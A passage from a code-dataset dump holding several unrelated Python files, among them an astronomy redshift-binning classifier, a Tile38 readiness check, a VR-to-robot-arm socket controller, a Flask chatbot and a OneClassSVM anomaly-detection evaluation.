'/gpfs/mskmindhdp_emc/data/TCGA-BRCA/TCGA-D8-A4Z1-01Z-00-DX1.D39D38B5-FC9F-4298-8720-016407DC6591/test_collect_tiles/address.slice.csv',\n 'tests/luna_pathology/common/testdata', params)\n\n print(res)\n\"\"\"\n","sub_path":"tests/luna_pathology/common/test_preprocess.py","file_name":"test_preprocess.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"328206032","text":"\"\"\"\nThis is an example tomographic bin generator using a random forest.\n\nEvery classifier module needs to:\n - have construction of the type \n __init__ (self, bands, options) (see examples below)\n - implement two functions: \n train (self, training_data,training_z)\n apply (self, data).\n - define valid_options class varible.\n\nSee Classifier Documentation below.\n\"\"\"\n\nfrom .base import Tomographer\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nimport jax_cosmo.parameters\nimport jax_cosmo.background\n\n\nclass funbins(Tomographer):\n \"\"\" Random Forest Classifier \"\"\"\n \n # valid parameter -- see below\n valid_options = ['bins', 'seed', 'method', 'combinebins']\n # this settings means arrays will be sent to train and apply instead\n # of dictionaries\n wants_arrays = True\n \n def __init__ (self, bands, options):\n \"\"\"Constructor\n \n Parameters:\n -----------\n bands: str\n string containg valid bands, like 'riz' or 'griz'\n options: dict\n options come through here. Valid keys are listed as valid_options\n class variable. \n\n Note:\n -----\n Valiad options are:\n 'bins' - number of tomographic bins\n 'seed' - the seed to use for RandomState\n 'method' - what method to use for binning: 'log', 'random', 'linear', 'chi'\n 'combinebins' - what 2 bins to combine as a list\n\n \"\"\"\n self.bands = bands\n self.opt = options\n\n def train (self, training_data, training_z):\n \"\"\"Trains the classifier\n \n Parameters:\n -----------\n training_data: numpy array, size Ngalaxes x Nbands\n training data, each row is a galaxy, each column is a band as per\n band defined above\n training_z: numpy array, size Ngalaxies\n true redshift for the training sample\n\n \"\"\"\n #reading in elements from yaml\n n_bin = self.opt['bins']\n \n if self.opt['seed'] is None:\n seed = 123\n print('The default seed is 123')\n else:\n seed = self.opt['seed']\n print(f'The seed is {seed}')\n \n if self.opt['method'] is None:\n method = 'log'\n print('The default method for binning has been set to log.')\n else:\n method = self.opt['method']\n assert method in ['log', 'random', 'linear', 'chi'], 'The method must be log, random, linear, or chi'\n print(f'The method has been set to {method}')\n \n if self.opt['combinebins'] is None:\n combine = None\n elif self.opt['combinebins'] is not None:\n combine = self.opt['combinebins']\n assert len(combine == 2), \"You can only combine 2 bins at one time right now!\"\n print(f'You are combining bins {combine[0]} and {combine[1]}')\n \n #set up a reproducible random state\n gen = np.random.RandomState(seed)\n \n #find bins\n print(\"Finding bins for training data\")\n \n training_bin = np.zeros(training_z.size) \n \n if method == 'log':\n #creating percentile binning in logspace\n p = np.logspace(0, 2, n_bin + 1)\n z_edges = np.percentile(training_z, p)\n \n if method == 'random':\n #creating a random binning by pulling from a uniform distribution\n z_edges = gen.uniform(0, 3, n_bin - 1)\n z_edges = np.insert(z_edges, 0, np.min(training_z))\n z_edges = np.insert(z_edges, 0, np.max(training_z))\n z_edges.sort()\n \n if method == 'linear':\n #the given random forest linear binning\n p = np.linspace(0, 100, n_bin +1)\n z_edges = np.percentile(training_z, p)\n \n #can add stuff here about david's method if it can be generalized to n bins\n #n_bin = 8\n #training_bin = np.load('dc2-labels.npy')#[:len(training_z)]\n #print(len(training_bin)) \n \n if method == 'chi':\n z = np.asarray(training_z)\n # Tabulate comoving distance over a grid spanning the full range of input redshifts.\n zgrid = np.linspace(0, z.max(), 1000)\n agrid = 1 / (1 + zgrid)\n model = jax_cosmo.parameters.Planck15()\n chi_grid = jax_cosmo.background.radial_comoving_distance(model, agrid)\n # Compute bin edges that are equally spaced in chi.\n chi_edges = np.linspace(0, chi_grid[-1], n_bin + 1)\n z_edges = np.empty(n_bin + 1)\n z_edges[0] = 0.\n z_edges[-1] = z.max()\n z_edges[1:-1] = np.interp(chi_edges[1:-1], chi_grid, zgrid)\n \n \n # Now find all the objects in each of these bins\n for i in range(n_bin):\n z_low = z_edges[i]\n z_high = z_edges[i + 1]\n training_bin[(training_z > z_low) & (training_z < z_high)] = i\n \n if combine:\n max_ = np.max(training_bin)\n if combine[1] == max_:\n #combine the bins, combining the higher/max bin into the lower bin is also moving because its max bin\n training_bin[training_bin == combine[1]] = combine[0]\n if combine[1] != max_:\n #combine the bins\n training_bin[training_bin == combine[1]] = combine[0]\n #move the max bin into the empty spot\n training_bin[training_bin == max_] = combine[1]\n \n # for speed, cut down to 5% of original size\n cut = gen.uniform(0, 1, training_z.size) < 0.05\n training_bin = training_bin[cut]\n training_data = training_data[cut]\n\n # Can be replaced with any classifier\n classifier = RandomForestClassifier()\n\n print(\"Fitting classifier\")\n # Lots of data, so this will take some time\n classifier.fit(training_data, training_bin)\n\n self.classifier = classifier\n #self.z_edges = z_edges\n\n\n def apply (self, data):\n \"\"\"Applies training to the data.\n \n Parameters:\n -----------\n Data: numpy array, size Ngalaxes x Nbands\n testing data, each row is a galaxy, each column is a band as per\n band defined above\n\n Returns: \n tomographic_selections: numpy array, int, size Ngalaxies\n tomographic selection for galaxies return as bin number for \n each galaxy.\n \"\"\"\n tomo_bin = self.classifier.predict(data)\n return tomo_bin\n\n","sub_path":"tomo_challenge/classifiers/myclassifier.py","file_name":"myclassifier.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"444676641","text":"import sys\nimport httplib\nimport json\nimport time\nimport subprocess\n\nurl1 = \"tile38-write\"\nurl2 = \"127.0.0.1\"\nport = 9851\n\nmaster_not_ready = True\nself_not_ready = True\n\ndef make_request(url):\n conn = httplib.HTTPConnection(url, port)\n conn.request(\"GET\", \"/server\")\n res = conn.getresponse()\n body = res.read().decode('utf-8')\n return json.loads(body)\n\ndef wait():\n sys.stdout.write('.')\n sys.stdout.flush()\n time.sleep(1)\n return\n\nwhile master_not_ready:\n try:\n obj = make_request(url1)\n if obj['stats']['num_objects'] > 10:\n master_not_ready = False\n subprocess.call([\"./tile38-cli\", \"FOLLOW\", \"tile38-write\", \"9851\"])\n subprocess.call([\"./tile38-cli\", \"READONLY\", \"yes\"])\n break\n except Exception as err:\n print(err)\n wait()\n\nwhile self_not_ready:\n try:\n obj = make_request(url2)\n if obj['stats']['num_objects'] > 10:\n self_not_ready = False\n break\n except Exception as err:\n print(err)\n wait()\n","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"563690605","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 20 15:05:53 2017\n\n@author: yshi321\n\"\"\"\n\nimport triad_openvr\n#import time\nimport sys\nimport socket\nimport re\nimport math\nimport numpy as np\n\n\nHOST = \"192.168.1.3\" # The remote host\nCLIENT = \"192.168.1.10\"\nPORT = 30000 # The same port as used by the server\nprint(\"Starting Program\")\ncount = 0\n\n#the pc is the server and the arm is the client\n\nX = 0\nY = 0\nZ = 0\nRX = 0\nRY = 0\nRZ = 0\n\nv = triad_openvr.triad_openvr()\nv.print_discovered_objects()\n\nposePosition = []\ntargetPosition1 = [0, 0, 0, 0, 0, 0]\n\nlowerLimit = float(0.1)\nupperLimit = float(0.55)\n\ni=0\nsample=25\n\nrxList = [0.04]*sample\nryList = [-3.12]*sample\nrzList = [-0.30]*sample\n\n#the socket is no longer opening and closing constantly which means that \n#the program on the touchpad needs to be running first then run this\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind((HOST, PORT)) # Bind to the port \ns.listen(5) # Now wait for client connection.\nc, addr = s.accept() # Establish connection with client.\nprint(\"Established Connection\")\n\n\nwhile (True):\n\n #reading controller coordinates\n txt = \"\"\n for each in v.devices[\"controller_1\"].get_pose_quaternion():\n txt += \"%.2f\" % each\n txt += \" \"\n targetPosition1 = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(txt))\n \n X = (float(targetPosition1[2]) + 2.3)\n \n if (X < lowerLimit) & (X >= 0):\n X = lowerLimit\n elif (X < 0) & (X > -lowerLimit):\n X = -lowerLimit\n elif X > upperLimit:\n X = upperLimit\n elif X < -upperLimit:\n X = -upperLimit\n# \n #Y axis is up and down\n Y = (float(targetPosition1[0]) + .3)\n# \n if (Y < lowerLimit) & (Y >= 0):\n Y = lowerLimit\n elif (Y < 0) & (Y > -lowerLimit):\n Y = -lowerLimit\n elif Y > upperLimit:\n Y = upperLimit\n elif Y < -upperLimit:\n Y = -upperLimit\n# \n #Z axis is forward and back\n Z = float(targetPosition1[1]) + 1.6\n\n if Z > 1.1-math.sqrt(X*X+Y*Y):\n Z = 1.1-math.sqrt(X*X+Y*Y)\n # next 3 numbers: \n qw=float(targetPosition1[3])\n qx=float(targetPosition1[4])\n qy=float(targetPosition1[5])\n qz=float(targetPosition1[6])\n \n angle = 2*math.acos(qw)\n x = qx / math.sqrt(1-qw*qw)\n y = qy / math.sqrt(1-qw*qw)\n z = qz / math.sqrt(1-qw*qw)\n \n T = qx*qy + qz*qw\n if (T > 0.499):\n yaw = 2*math.atan2(qx,qw)\n roll = math.pi/2\n pitch = 0\n elif (T < -0.499):\n yaw = -2*math.atan2(qx,qw)\n roll = -math.pi/2\n pitch = 0\n else:\n yaw = math.atan2(2*qy*qw - 2*qx*qz, 1- 2*qy*qy - 2*qz*qz)\n roll = math.asin(2*T)\n pitch = math.atan2(2*qx*qw - 2*qy*qz,1-2*qx*qx-2*qz*qz)\n \n #recalibrating\n yaw = -math.pi + yaw\n if yaw < -math.pi:\n yaw = yaw + 2*math.pi\n \n pitch = pitch - math.pi/2\n if (pitch > -1.5*math.pi) & (pitch < -math.pi):\n pitch = pitch+2*math.pi\n \n #converting pitch roll and yaw into RX RY AND RZ values \n \n pitchMatrix = np.matrix([\n [math.cos(-pitch), 0, math.sin(-pitch)],\n [0, 1, 0],\n [-math.sin(-pitch), 0, math.cos(-pitch)]\n ])\n \n rollMatrix = np.matrix([\n [1, 0, 0],\n [0, math.cos(roll), -math.sin(roll)],\n [0, math.sin(roll), math.cos(roll)]\n ])\n\n yawMatrix = np.matrix([\n [math.cos(yaw), -math.sin(yaw), 0],\n [math.sin(yaw), math.cos(yaw), 0],\n [0, 0, 1]\n ])\n \n \n R = yawMatrix * pitchMatrix * rollMatrix\n \n theta = math.acos(((R[0, 0] + R[1, 1] + R[2, 2]) - 1) / 2)\n \n if theta != 0 :\n multi = 1 / (2 * math.sin(theta))\n rx = multi * (R[2, 1] - R[1, 2]) * theta\n ry = multi * (R[0, 2] - R[2, 0]) * theta\n rz = multi * (R[1, 0] - R[0, 1]) * theta\n elif theta == 0:\n rx = 0\n ry = 0\n rz = 0\n\n #applying running average filter to the angles\n if i < sample:\n rxList[i]=float(rx)\n ryList[i]=float(ry)\n rzList[i]=float(rz)\n \n if i==(sample-1):\n i=0\n else:\n i=i+1\n\n rx = round(sum(rxList)/sample, 2)\n ry = round(sum(ryList)/sample, 2)\n rz = round(sum(rzList)/sample, 2)\n\n try:\n msg = c.recv(1024)\n posePosition = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(msg))\n# print('\\r', posePosition, end='')\n \n #msg = c.recv(1024)\n #jointPosition = re.findall(r\"[-+]?\\d*\\.\\d+|\\d+\", str(msg))\n #print(\"Joint : \", jointPosition)\n #msg = c.recv(1024)\n #c.sendto((\"movel(p[\"+ str(X) + \", \" + str(Y) + \", \" + str(Z) + \", \" + str(RX) + \", \" + str(RY) + \", \" + str(RZ) + \"], a=1.3962634015954636, v=0.2)\"+ \"\\n\").encode(), (CLIENT, PORT)) \n #time.sleep(0.1)\n #if 'asking_for_data' in str(msg):\n # count = count + 1\n \n\n \n #next 3 numbers that need to be sent are the joint angles of the arm\n #these joint angles correspond to the pitch, yaw and roll\n \n \n #RX is the pitch\n #pitch from the targetPosition works where it is 0 at rest (horizontal)\n #rx = rx - float(posePosition[3])\n # ry is the roll\n # roll works similar to pitch where it is 0 at rest position (horizontal)\n #ry = ry - float(posePosition[4])\n # rz is the yaw \n # yaw is a bit weird, were it 0 and goes to +- 90 on either side and then mirrors itself \n # on the other side, so it goes -0 <- -90 <- 0 -> 90 -> 0\n #rz = rz - float(posePosition[5])\n \n # may need to have software limits on where the arm can go, but this comes from testing\n \n \n #time.sleep(0.5)\n #c.sendto((\"(\" + str(X) + \",\" + str(Y) + \",\" + str(Z) + \",\" + str(rx) + \",\" + str(ry) + \",\" + str(rz) + \")\").encode(),(CLIENT, PORT));\n c.sendto((\"(\" + str(X) + \",\" + str(Y) + \",\" + str(Z) + \",\" + str(rx) + \",\" + str(ry) + \",\" + str(rz) + \")\").encode(),(CLIENT, PORT));\n \n #printing posePosition and values sent to robot\n\n except socket.error as socketerror:\n print(\"Error\")\n \nc.close()\ns.close()\nprint(\"Program finish\")","sub_path":"Scripts/controller_v2.py","file_name":"controller_v2.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"386521127","text":"from flask import Flask, render_template, request\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' \n\nimport nltk\nfrom nltk.stem.lancaster import LancasterStemmer\nstemmer = LancasterStemmer()\n\nimport numpy\nimport tflearn\nimport tensorflow\nimport random\nimport json\nimport pickle\nfrom duckduckpy import query\nimport sqlite3\n\napp = Flask(__name__)\n\n\ntensorflow.compat.v1.logging.set_verbosity(tensorflow.compat.v1.logging.ERROR)\n\nwith open(\"./../data/intents.json\") as file:\n data = json.load(file)\n\ntry:\n with open(\"data.pickle\", \"rb\") as f:\n words, labels, training, output = pickle.load(f)\nexcept:\n words = []\n labels = []\n docs_x = []\n docs_y = []\n\n for intent in data[\"intents\"]:\n for pattern in intent[\"patterns\"]:\n wrds = nltk.word_tokenize(pattern)\n words.extend(wrds)\n docs_x.append(wrds)\n docs_y.append(intent[\"tag\"])\n\n if intent[\"tag\"] not in labels:\n labels.append(intent[\"tag\"])\n\n words = [stemmer.stem(w.lower()) for w in words if w != \"?\"]\n words = sorted(list(set(words)))\n\n labels = sorted(labels)\n\n training = []\n output = []\n\n out_empty = [0 for _ in range(len(labels))]\n\n for x, doc in enumerate(docs_x):\n bag = []\n\n wrds = [stemmer.stem(w.lower()) for w in doc]\n\n for w in words:\n if w in wrds:\n bag.append(1)\n else:\n bag.append(0)\n\n output_row = out_empty[:]\n output_row[labels.index(docs_y[x])] = 1\n\n training.append(bag)\n output.append(output_row)\n\n\n training = numpy.array(training)\n output = numpy.array(output)\n\n with open(\"data.pickle\", \"wb\") as f:\n pickle.dump((words, labels, training, output), f)\n\ntensorflow.reset_default_graph()\n\nnet = tflearn.input_data(shape=[None, len(training[0])])\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, 8)\nnet = tflearn.fully_connected(net, len(output[0]), activation=\"softmax\")\nnet = tflearn.regression(net)\n\ntry:\n model = tflearn.DNN(net)\n model.load(\"model.tflearn\")\nexcept:\n model = tflearn.DNN(net)\n\n model.fit(training, output, n_epoch=997, batch_size=8, show_metric=True)\n model.save(\"model.tflearn\")\n\ndef bag_of_words(s, words):\n bag = [0 for _ in range(len(words))]\n\n s_words = nltk.word_tokenize(s)\n s_words = [stemmer.stem(word.lower()) for word in s_words]\n\n for se in s_words:\n for i, w in enumerate(words):\n if w == se:\n bag[i] = 1\n \n return numpy.array(bag)\n\ndef duckduckgo_response(input_statement):\n try:\n response = query(input_statement, container='dict')\n except:\n return 'Sorry, cannot find anything about it. Please change the query and try again...'\n\n if response['abstract_text']:\n response_statement = response['abstract_text']\n # response_statement.confidence = 1\n else:\n response_statement = 'Sorry, cannot find anything about it. Please change the query and try again...'\n # response_statement.confidence = 0\n\n return response_statement\n\ndef create_table():\n try:\n conn = sqlite3.connect('bot.sqlite')\n\n cursor = conn.cursor()\n\n query = '''\n CREATE TABLE IF NOT EXISTS feedback(\n id INTEGER PRIMARY KEY, \n key TEXT UNIQUE,\n value TEXT\n )\n '''\n\n cursor.execute(query)\n except Exception as e:\n raise e\n finally:\n conn.commit()\n conn.close()\n\n\ndef get_feedback_response(request):\n try:\n conn = sqlite3.connect('bot.sqlite')\n cursor = conn.cursor()\n\n query = '''\n SELECT key, value\n FROM feedback\n WHERE key = ?\n '''\n\n cursor.execute(query, (request,))\n value = cursor.fetchone()\n except:\n return None\n finally:\n conn.commit()\n conn.close()\n \n return value\n\ndef set_feedback_response(request, response):\n try:\n conn = sqlite3.connect('bot.sqlite')\n cursor = conn.cursor()\n\n query = '''\n INSERT OR REPLACE INTO feedback (key, value)\n VALUES(?,?);\n '''\n\n cursor.execute(query, (request, response))\n except Exception as e:\n raise e\n finally:\n conn.commit()\n conn.close()\n\ndef chat(inp):\n # print(\"Start talking with the bot (type 'quit' or 'q' to stop)!\")\n # while True:\n # print('\\x1b[6;30;42m' + 'You:' + '\\x1b[0m', end=' ')\n # inp = input()\n # if inp.lower() == \"quit\" or inp.lower() == \"q\":\n # print('Bye Bye!')\n # break\n # elif inp is None:\n # continue\n\n previous_response = get_feedback_response(inp.lower())\n\n if(previous_response is None):\n results = model.predict([bag_of_words(inp, words)])[0]\n results_index = numpy.argmax(results)\n tag = labels[results_index]\n\n # print(results[results_index])\n\n if results[results_index] > 0.70:\n for tg in data[\"intents\"]:\n if tg['tag'] == tag:\n responses = tg['responses']\n response = random.choice(responses)\n else:\n response = duckduckgo_response(inp)\n else:\n response = previous_response[1]\n\n return response\n\n # print('\\x1b[6;30;44m' + 'Bot:' + '\\x1b[0m ', response)\n \n # get_feedback(inp.lower())\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n# @app.route(\"/get\")\n# def get_bot_response():\n# userText = request.args.get('msg')\n# return str(english_bot.get_response(userText))\n\n@app.route(\"/get\")\ndef get_bot_response():\n userText = request.args.get('msg')\n return str(chat(userText)).replace(\"\\n\", \"
\")\n # print(ans)\n # return ans\n\n\nif __name__ == \"__main__\":\n create_table()\n app.run()\n","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"411962501","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_utils import uuidutils\n\nfrom karbor.common import constants\nfrom karbor import context\nfrom karbor import exception\nfrom karbor.i18n import _\nfrom karbor import objects\nfrom karbor.services.operationengine.operations import base\n\n\nclass ProtectOperation(base.Operation):\n \"\"\"Protect operation.\"\"\"\n\n OPERATION_TYPE = \"protect\"\n\n def check_operation_definition(self, operation_definition):\n provider_id = operation_definition.get(\"provider_id\")\n if not provider_id or not uuidutils.is_uuid_like(provider_id):\n reason = _(\"Provider_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n plan_id = operation_definition.get(\"plan_id\")\n if not plan_id or not uuidutils.is_uuid_like(plan_id):\n reason = _(\"Plan_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n plan = objects.Plan.get_by_id(context.get_admin_context(), plan_id)\n if provider_id != plan.provider_id:\n reason = _(\"Provider_id is invalid\")\n raise exception.InvalidOperationDefinition(reason=reason)\n\n def _execute(self, operation_definition, param):\n log_ref = self._create_operation_log(param)\n self._run(operation_definition, param, log_ref)\n\n def _resume(self, operation_definition, param, log_ref):\n self._run(operation_definition, param, log_ref)\n\n def _run(self, operation_definition, param, log_ref):\n client = self._create_karbor_client(\n param.get(\"user_id\"), param.get(\"project_id\"))\n provider_id = operation_definition.get(\"provider_id\")\n plan_id = operation_definition.get(\"plan_id\")\n trigger_id = param.get(\"trigger_id\", None)\n scheduled_operation_id = param.get(\"scheduled_operation_id\", None)\n extra_info = {\n 'created_by': constants.OPERATION_ENGINE,\n 'trigger_id': trigger_id,\n 'scheduled_operation_id': scheduled_operation_id\n }\n try:\n client.checkpoints.create(provider_id, plan_id, extra_info)\n except Exception:\n state = constants.OPERATION_EXE_STATE_FAILED\n else:\n state = constants.OPERATION_EXE_STATE_SUCCESS\n\n self._update_log_when_operation_finished(log_ref, state)\n","sub_path":"karbor/services/operationengine/operations/protect_operation.py","file_name":"protect_operation.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"286548350","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pyod.models.ocsvm import OCSVM\n\n# ts_train_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_5%.csv')\n# # ts_train_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_10%.csv')\n# # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_15%.csv')\n# print(ts_train_df.head())\n# train_dataset_value = ts_train_df.value.values[700:]\n# train_dataset_labels = ts_train_df.is_anomaly.values[700:]\n# train_dataset_timestamp = ts_train_df.timestamp.values[700:]\n# X_train = train_dataset_value.reshape((-1, 1))\n# y_train = train_dataset_labels.reshape((-1, 1))\n\n\nclf_name = 'OneClassSVM'\n# clf = OCSVM(contamination=0.05)\n# clf.fit(X_train)\n# # get the prediction labels and outlier scores of the training data\n# y_train_pred = clf.labels_ # binary labels (0: inliers, 1: outliers)\n# # 训练集\n# # 实际异常值索引\n# train_actual_anomaly_index = np.where(train_dataset_labels == 1)[0]\n# # 实际正常值索引\n# train_actual_normal_index = np.where(train_dataset_labels == 0)[0]\n# # 预测异常值索引\n# train_pred_anomaly_index = np.where(y_train_pred == 1)[0]\n# # 预测正常值索引\n# train_pred_normal_index = np.where(y_train_pred == 0)[0]\n# train_TP = len(np.intersect1d(train_actual_anomaly_index, train_pred_anomaly_index))\n# train_TN = len(np.intersect1d(train_actual_normal_index, train_pred_normal_index))\n# train_FN = len(np.intersect1d(train_actual_anomaly_index, train_pred_normal_index))\n# train_accuracy = (train_TP + train_TN) / len(train_dataset_labels)\n# if len(train_pred_anomaly_index) == 0:\n# train_precision = 0\n# else:\n# train_precision = train_TP / len(train_pred_anomaly_index)\n# if (train_TP + train_FN) == 0:\n# train_recall = 0\n# else:\n# train_recall = train_TP / (train_TP + train_FN)\n# if train_precision == 0 or train_recall == 0:\n# train_F1_Score = 0\n# else:\n# train_F1_Score = 2 / (1 / train_precision + 1 / train_recall)\nprint(\"模型:\", 'OCSVM')\n# print(\"数据集:\", 'real_2_5%')\n# print(\"Accuracy:\", '%.2f%%' % (train_accuracy * 100))\n# print(\"Precision:\", '%.2f%%' % (train_precision * 100))\n# print(\"Recall:\", '%.2f%%' % (train_recall * 100))\n# print(\"F1-Score:\", '%.2f%%' % (train_F1_Score * 100))\n\n\nfor i in [2, 3, 24, 30, 34, 38, 67]:\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_2_'+str(i)+'%.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/A1Benchmark/real_'+str(i)+'.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'5%.csv')\n ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'10%.csv')\n # ts_test_df = pd.read_csv('data/Yahoo_S5/dataset/real_'+str(i)+'_'+'15%.csv')\n ts_test_df.head()\n test_dataset_value = ts_test_df.value.values[700:]\n test_dataset_labels = ts_test_df.is_anomaly.values[700:]\n test_dataset_timestamp = ts_test_df.timestamp.values[700:]\n X_test = test_dataset_value.reshape((-1, 1))\n y_test = test_dataset_labels.reshape((-1, 1))\n # train OCSVM detector\n contamination = 0.12\n clf = OCSVM(contamination=contamination)\n clf.fit(X_test)\n # get the prediction labels and outlier scores of the test data\n y_test_pred = clf.predict(X_test) # outlier labels (0 or 1)\n # y_test_scores = clf.decision_function(X_test) # outlier scores\n # 测试集\n # 实际异常值索引\n test_actual_anomaly_index = np.where(test_dataset_labels == 1)[0]\n # 实际正常值索引\n test_actual_normal_index = np.where(test_dataset_labels == 0)[0]\n # 预测异常值索引\n test_pred_anomaly_index = np.where(y_test_pred == 1)[0]\n # 预测正常值索引\n test_pred_normal_index = np.where(y_test_pred == 0)[0]\n test_TP = len(np.intersect1d(test_actual_anomaly_index, test_pred_anomaly_index))\n test_TN = len(np.intersect1d(test_actual_normal_index, test_pred_normal_index))\n test_FN = len(np.intersect1d(test_actual_anomaly_index, test_pred_normal_index))\n test_accuracy = (test_TP + test_TN) / len(test_dataset_labels)\n if len(test_pred_anomaly_index) ==0:\n test_precision = 0\n else:\n test_precision = test_TP / len(test_pred_anomaly_index)\n if (test_TP + test_FN) == 0:\n test_recall = 0\n else:\n test_recall = test_TP / (test_TP + test_FN)\n if test_precision ==0 or test_recall ==0:\n test_F1_Score = 0\n else:\n test_F1_Score = 2 / (1 / test_precision + 1 / test_recall)\n # print(\"数据集:\", 'real_2_'+str(i)+'%')\n # print(\"数据集:\", 'real_' + str(i) + '_'+'2%.csv')\n print(\"数据集:\", 'real_' + str(i) + '_'+'5%.csv')\n # print(\"数据集:\", 'real_' + str(i) + '_' + '10%.csv')\n # print(\"数据集:\", 'real_' + str(i) + '_' + '15%.csv')\n print(\"contamination:\", contamination)\n print(\"Accuracy:\", '%.2f%%' % (test_accuracy * 100))\n print(\"Precision:\", '%.2f%%' % (test_precision * 100))\n print(\"Recall:\", '%.2f%%' % (test_recall * 100))\n print(\"F1-Score:\", '%.2f%%' % (test_F1_Score * 100))","sub_path":"Compare_Approaches/OCSVM_train.py","file_name":"OCSVM_train.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"467629206","text":"__author__ = 'kgori'\n\nimport pllpy\n\nclass PLLException(Exception):\n pass\n\n\ndef create_instance(alignment, partitions, tree, threads=1, rns=int(\"0xCA55E77E\", 16)):\n try:\n with open(alignment):\n pass\n except IOError as exc:\n raise exc\n\n if tree in ['random', 'parsimony']:\n if tree == 'random':\n instance = pllpy.pll(alignment, partitions, False, threads, rns)\n else:\n instance = pllpy.pll(alignment, partitions, True, threads, rns)\n else:\n instance = pllpy.pll(alignment, partitions, tree, threads, rns)\n return instance\n\n\ndef set_partition_model_parameters(instance, partition, alpha, freqs, rates, empirical_freqs, equal_freqs):\n \"\"\"\n Sets parameter values for a specific partition.\n\n :param instance: PLL instance being modified\n :param partition: Number of the partition having its parameters set\n :param alpha: Alpha parameter of the 4-category discrete gamma rates distribution\n :param freqs: Equilibrium frequencies of states (4 for DNA, 20 for aa)\n :param rates: Relative substitution rate parameters - values of the upper triangle of 4x4 matrix,\n so 6 numbers in all. The sixth value must be 1.0. Assume matrix is in \"acgt\" order.\n Only applies to DNA data; protein models all use empirical rates.\n :param empirical_freqs: Use empirical estimates for state frequencies. Overwrites 'freqs'.\n :param equal_freqs: Set all state frequencies to 1/num_states\n :return: void\n \"\"\"\n if empirical_freqs:\n freqs = instance.get_empirical_frequencies()[partition]\n elif equal_freqs:\n if instance.is_dna(partition):\n freqs = [0.25] * 4\n else:\n freqs = [0.05] * 20\n if alpha is not None:\n instance.set_alpha(alpha, partition, True)\n if freqs is not None:\n instance.set_frequencies(freqs, partition, True)\n if rates is not None:\n instance.set_rates(rates, partition, True)\n\n\ndef set_params_from_dict(instance, model):\n \"\"\"\n Sets parameters of pll instance according to dict\n :param instance: pll instance\n :param model: dict describing pll model parameters\n :return:\n \"\"\"\n p_info = model['partitions']\n for i in range(instance.get_number_of_partitions()):\n alpha = p_info[i].get('alpha')\n freqs = p_info[i].get('frequencies')\n rates = p_info[i].get('rates')\n set_partition_model_parameters(instance, i, alpha, freqs, rates, False, False)\n return instance\n\n\ndef pll_to_dict(instance):\n \"\"\"\n Summarises parameter values from PLL instance and writes their values\n to disk in a json format file\n\n :param instance: PLL instance being summarised\n :param json_file: Either a filepath or a file-like stream (e.g. sys.stdout)\n :return: void\n \"\"\"\n model = {'ml_tree': instance.get_tree(), 'likelihood': instance.get_likelihood(), 'partitions': {}}\n for i in range(instance.get_number_of_partitions()):\n data = {'alpha': instance.get_alpha(i), 'frequencies': instance.get_frequencies_vector(i)}\n if instance.is_dna(i):\n data['rates'] = instance.get_rates_vector(i)\n data['model'] = instance.get_model_name(i)\n data['name'] = instance.get_partition_name(i)\n model['partitions'][i] = data\n return model\n","sub_path":"treeCl/utils/pll_helpers.py","file_name":"pll_helpers.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359739189","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\n#作者:ChrisChan\n#用途:\nfrom tkinter import *\n\n'''\n1、这个程序实现文本框输入。\n2、使用grid方法按照Excel表格方式对组件位置进行安排\n3、通过Button提交按钮实现获取用户的输入信息。\n'''\nroot = Tk()\n\nLabel1 = Label(root, text='会员名称:').grid(row=0, column=0)\nLabel2 = Label(root, text='会员代号:').grid(row=1, column=0)\n\nv1 = StringVar()\np1 = StringVar()\ne1 = Entry(root, textvariable=v1) # Entry 是 Tkinter 用来接收字符串等输入的控件.\ne2 = Entry(root, textvariable=p1, show='#')\ne1.grid(row=0, column=1, padx=10, pady=5) # 